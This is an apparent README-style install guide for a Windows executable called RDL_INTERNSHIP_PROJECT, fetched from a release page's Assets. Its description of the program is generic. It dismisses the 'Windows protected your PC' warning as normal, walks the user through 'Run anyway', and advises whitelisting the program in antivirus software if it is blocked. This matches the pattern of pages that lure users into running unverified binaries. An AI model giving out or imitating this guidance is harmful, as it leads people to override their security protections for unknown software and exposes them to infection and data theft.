Follow these steps to complete the download:
- Open the link provided above in your web browser.
- Look for the section labeled Assets at the bottom of the page.
- Click on the file that ends with the .exe extension.
- Select a folder on your computer to save the file.

After the file downloads to your computer, follow these instructions to set it up.
- Open your Downloads folder or the folder where you saved the file.
- Find the file with the RDL_INTERNSHIP_PROJECT name.
- Double-click the file to start the installer.
- Your computer might show a security window. This is a normal check for new files.
- Select More info if you see a prompt that says "Windows protected your PC."
- Select Run anyway to start the setup process.
- Follow the prompts on the screen. The installer asks you where to put the program files. The default location works for most users.
- Click Finish once the process indicates that the setup is complete.
You can open the program using the icon found on your desktop. If you do not see an icon, use the Windows search bar at the bottom left of your screen. Type the name of the project and click the application result.
When you open the program for the first time, it checks for existing data. If it finds none, it creates a clean workspace for you. You see a dashboard with a menu on the left side of your screen. This menu allows you to navigate between different categories like Tasks, Reports, and Settings.
The interface works like common Windows programs. You use your mouse to click buttons and tabs.
- Adding entries: Click the add button at the top of the main window. Fill in the required text fields and click save.
- Editing information: Select an entry from the list. Click the edit icon to change the details. Ensure you click the save button before you exit the screen.
- Exporting data: You can save your records into a file that you can open in other programs. Go to the file menu at the top left and choose the export option. You can name your file and save it to any folder on your computer.
- Changing settings: Access the settings tab to change theme colors or file storage locations.
If you face problems, check these tips first.
- The program does not start: Check if your antivirus software is blocking the file. Sometimes security tools prevent new programs from launching. You can add the program folder to your antivirus whitelist.
- The screen looks blurry: Adjust your Windows display settings. Set your scaling to 100% or 125% to ensure the text and buttons appear correctly.
- Missing data entries: Check if you saved your changes before closing the entry window. Also, check the storage location in the settings menu to verify the program is looking in the correct folder for your data files.
- Updates: Periodically check the release link provided at the top of this document. If a newer version exists, download and install it over your existing version. The installer handles the transition and keeps your current data intact.
This application saves all your information directly on your computer. It does not send your data to external servers or cloud services. You maintain control over every file you create. Since the software does not require an internet connection to run, you can work while offline. Regular backups of your project folder are recommended. Copy the folder containing your data to a USB drive or a secondary hard drive to protect against hardware failure.
